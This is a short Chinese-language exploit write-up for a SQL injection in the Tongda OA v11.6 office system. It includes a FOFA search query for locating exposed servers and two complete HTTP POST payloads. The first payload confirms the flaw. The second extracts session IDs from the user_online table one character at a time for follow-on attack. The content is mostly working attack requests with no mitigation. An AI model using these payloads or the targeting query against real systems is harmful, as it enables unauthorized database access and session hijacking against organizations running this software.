# 通达OA v11.6 insert SQL注入漏洞 ## 漏洞描述 通达OA v11.6 insert参数包含SQL注入漏洞,攻击者通过漏洞可获取数据库敏感信息 ## 漏洞影响 ``` 通达OA v11.6 ``` ## 网络测绘 ``` app="TDXK-通达OA" ``` ## 漏洞复现 登陆页面 ![image-20220520154138233](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201541419.png) 发送请求包判断漏洞 ``` POST /general/document/index.php/recv/register/insert HTTP/1.1 Host: User-Agent: Go-http-client/1.1 Content-Length: 77 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER= ``` 返回302则是存在漏洞,返回500则不存在 ![image-20220520154148858](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201541900.png) 确认存在漏洞后,再通过SQL注入获取 SessionID进一步攻击 ``` POST /general/document/index.php/recv/register/insert HTTP/1.1 Host: User-Agent: Go-http-client/1.1 Content-Length: 122 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip title)values("'"^exp(if(ascii(substr((select/**/SID/**/from/**/user_online/**/limit/**/0,1),8,1))<66,1,710)))# =1&_SERVER= ```